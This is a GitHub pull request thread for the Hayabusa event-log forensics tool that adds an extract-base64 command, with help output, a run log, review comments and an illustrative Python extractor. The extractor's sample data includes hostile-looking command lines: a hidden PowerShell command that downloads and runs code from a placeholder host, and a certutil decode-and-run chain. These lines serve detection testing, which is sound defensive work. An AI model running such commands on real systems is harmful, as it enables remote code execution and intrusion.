
feat: extract-base64 cmd #1522

Merged 10 commits into main from 1512-extract-base64-cmd on Dec 4, 2024

Conversation

fukusuket (Collaborator) commented Dec 1, 2024

What Changed

Evidence

Integration-Test

I would appreciate it if you could check it out when you have time🙏

fukusuket self-assigned this Dec 1, 2024
fukusuket added the enhancement (New feature or request) label Dec 1, 2024

fukusuket (Author) commented:

help

fukusuke@fukusukenoMacBook-Air hayabusa-2.19.0-mac-aarch64 % ./hayabusa extract-base64 -h
Hayabusa v3.0.0 - Dev Build
Yamato Security (https://github.com/Yamato-Security/hayabusa - @SecurityYamato)

Usage:
  hayabusa.exe extract-base64 <INPUT> [OPTIONS]

Input:
  -d, --directory <DIR>  Directory of multiple .evtx files
  -f, --file <FILE>      File path to one .evtx file
  -l, --live-analysis    Analyze the local C:\Windows\System32\winevt\Logs folder

General Options:
  -C, --clobber                        Overwrite files when saving
  -h, --help                           Show the help menu
  -J, --JSON-input                     Scan JSON formatted logs instead of .evtx (.json or .jsonl)
  -Q, --quiet-errors                   Quiet errors mode: do not save error logs
  -x, --recover-records                Carve evtx records from slack space (default: disabled)
  -c, --rules-config <DIR>             Specify custom rule config directory (default: ./rules/config)
  -t, --threads <NUMBER>               Number of threads (default: optimal number for performance)
      --target-file-ext <FILE-EXT...>  Specify additional evtx file extensions (ex: evtx_data)

Filtering:
      --exclude-computer <COMPUTER...>  Do not scan specified computer names (ex: ComputerA) (ex: ComputerA,ComputerB)
      --include-computer <COMPUTER...>  Scan only specified computer names (ex: ComputerA) (ex: ComputerA,ComputerB)
      --time-offset <OFFSET>            Scan recent events based on an offset (ex: 1y, 3M, 30d, 24h, 30m)

Output:
  -o, --output <FILE>  Extract Base64 strings

Display Settings:
  -K, --no-color  Disable color output
  -q, --quiet     Quiet mode: do not display the launch banner
  -v, --verbose   Output verbose information

Time Format:
      --European-time     Output timestamp in European time format (ex: 22-02-2022 22:00:00.123 +02:00)
  -O, --ISO-8601          Output timestamp in original ISO-8601 format (ex: 2022-02-22T10:10:10.1234567Z) (Always UTC)
      --RFC-2822          Output timestamp in RFC 2822 format (ex: Fri, 22 Feb 2022 22:00:00 -0600)
      --RFC-3339          Output timestamp in RFC 3339 format (ex: 2022-02-22 22:00:00.123456-06:00)
      --US-military-time  Output timestamp in US military time format (ex: 02-22-2022 22:00:00.123 -06:00)
      --US-time           Output timestamp in US time format (ex: 02-22-2022 10:00:00.123 PM -06:00)
  -U, --UTC               Output time in UTC format (default: local time)

fukusuket (Author) commented Dec 1, 2024

-o option

./hayabusa extract-base64 -d ../hayabusa-sample-evtx -o result.csv --ISO-8601 -C -q
Start time: 2024/12/02 00:00
Total event log files: 598
Total file size: 139.2 MB

Loading detection rules. Please wait.

[00:00:00] 598 / 598   [========================================] 100%

Scanning finished.
Saved results: result.csv (610.1 KB)

Elapsed time: 00:00:00.821

fukusuket marked this pull request as ready for review December 1, 2024 15:04

fukusuket (Author) commented:

no -o option

(screenshot of the results printed to standard output)

Shirofune-Security (Contributor) commented:

@fukusuket Thanks so much! Looking really good, just a few small things:

  1. Sometimes the trailing = or == will be found after the <Base64String>. If it is possible, it would be nice to remove those as well.
  2. Sometimes there are false positives. I am not sure of a good way to get rid of these kinds of FPs, so if there is no good way that will not lower the other detections then don't worry about it. We can leave it in as it is.
  3. For the standard output, sometimes the decoded text field is blank. I think this is because the type is binary. Is it possible to output (Binary Data) to make this clearer?

fukusuket (Author) commented Dec 3, 2024

@Shirofune-Security @YamatoSecurity
Thank you so much for checking! I fixed cases 1 and 3!💪

  2. Sometimes there are false positives.

Sorry... This is a correct Base64 string, so there is no way around this FP at this time :(

fukusuket (Author) commented:

@Shirofune-Security @YamatoSecurity

  2. Sometimes there are false positives.

Not a complete workaround, but by adding a simple string match, I was able to exclude the false positive!
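The three review points in this thread (keep the trailing = or == together with the Base64 string, print (Binary Data) when the decoded bytes are not text, and knock out hash-like false positives with a simple string match) are the usual shape of a Base64 extractor for Windows event logs. The block below is an added Python example written for this page; it is not Hayabusa's own Rust implementation. The regex, the UTF-16LE heuristic for PowerShell -EncodedCommand payloads, the pure-hex exclusion rule, the minimum token length and the sample event lines are all assumptions constructed here.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Assumed minimum length of a Base64 candidate. Short identifiers such as
# "FromBase64String" (16 chars) are themselves valid Base64, so a higher floor
# trades a little recall for much less noise.
MIN_LEN = 20

# A run of Base64-alphabet characters plus its optional '=' / '==' padding, so
# the padding is captured with the string instead of being left behind as a
# separate trailing token.
B64_RE = re.compile(
    r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{%d,}={0,2})(?![A-Za-z0-9+/=])" % MIN_LEN
)
# Pure-hex tokens (file hashes, GUID fragments) are valid Base64 but almost
# never meaningful; this exclusion is an assumed heuristic, not a project rule.
HEX_RE = re.compile(r"[0-9a-fA-F]+")


@dataclass
class Extracted:
    original: str   # Base64 token exactly as found in the event text
    decoded: bytes  # raw decoded bytes
    text: str       # readable form, or "(Binary Data)" when it is not text
    encoding: str   # "utf-16le", "utf-8" or "binary"


def is_printable_text(s: str) -> bool:
    return all(c.isprintable() or c in "\r\n\t" for c in s)


def decode_candidate(token: str):
    """Decode one token; returns Extracted, or None if it is not valid Base64."""
    if len(token) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    # PowerShell -EncodedCommand is UTF-16LE; for ASCII text every odd byte is NUL.
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        txt = raw.decode("utf-16-le", errors="replace")
        if is_printable_text(txt):
            return Extracted(token, raw, txt, "utf-16le")
    try:
        txt = raw.decode("utf-8")
        if is_printable_text(txt):
            return Extracted(token, raw, txt, "utf-8")
    except UnicodeDecodeError:
        pass
    return Extracted(token, raw, "(Binary Data)", "binary")


def extract_from_text(text: str):
    """All decodable Base64 strings in one event's text, hash-like tokens excluded."""
    found = []
    for m in B64_RE.finditer(text):
        token = m.group(1)
        if HEX_RE.fullmatch(token):
            continue  # hash-like false positive (assumed heuristic)
        ex = decode_candidate(token)
        if ex is not None:
            found.append(ex)
    return found


def scan_events(events):
    """events: iterable of (computer, event_id, message) tuples -> (computer, event_id, Extracted) rows."""
    return [(c, e, ex) for c, e, msg in events for ex in extract_from_text(msg)]


# ---- constructed sample data (not real Hayabusa output or hayabusa-sample-evtx content) ----
PS_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
PS_B64 = base64.b64encode(PS_CMD.encode("utf-16-le")).decode("ascii")
PE_BYTES = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8"  # 17 bytes -> '=' padding
PE_B64 = base64.b64encode(PE_BYTES).decode("ascii")
WHOAMI_CMD = "whoami /all > C:\\Users\\Public\\out.txt"                      # 37 bytes -> '==' padding
WHOAMI_B64 = base64.b64encode(WHOAMI_CMD.encode()).decode("ascii")

SAMPLE_EVENTS = [
    ("WS01", 4104, f"powershell.exe -NoP -W Hidden -EncodedCommand {PS_B64}"),
    ("WS01", 4104, f"[System.Convert]::FromBase64String('{PE_B64}')"),
    ("WS02", 4688, f"cmd.exe /c echo {WHOAMI_B64} > enc.txt & certutil -decode enc.txt run.bat"),
    ("WS02", 1, "Image: C:\\Windows\\System32\\whoami.exe Hashes: MD5=0123456789ABCDEF0123456789ABCDEF"),
]

if __name__ == "__main__":
    for computer, event_id, ex in scan_events(SAMPLE_EVENTS):
        print(f"{computer}\t{event_id}\t{ex.encoding}\t{ex.original[:24]}...\t{ex.text}")
```

Run it directly to print one row per finding: the UTF-16LE PowerShell command and the plain-text command decode to readable text, the PE-like blob is reported as (Binary Data), and the MD5 hash, although it is valid Base64, is dropped by the string match. MIN_LEN and HEX_RE are the two knobs that trade recall against noise, which is the same trade-off the thread describes.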

YamatoSecurity (Collaborator) reviewed:

@fukusuket LGTM! Thank you!

YamatoSecurity merged commit 2560858 into main Dec 4, 2024
5 checks passed
YamatoSecurity deleted the 1512-extract-base64-cmd branch December 4, 2024 01:53

Labels: enhancement (New feature or request)
Linked issue (may be closed by this PR): New extract-base64 command
3 participants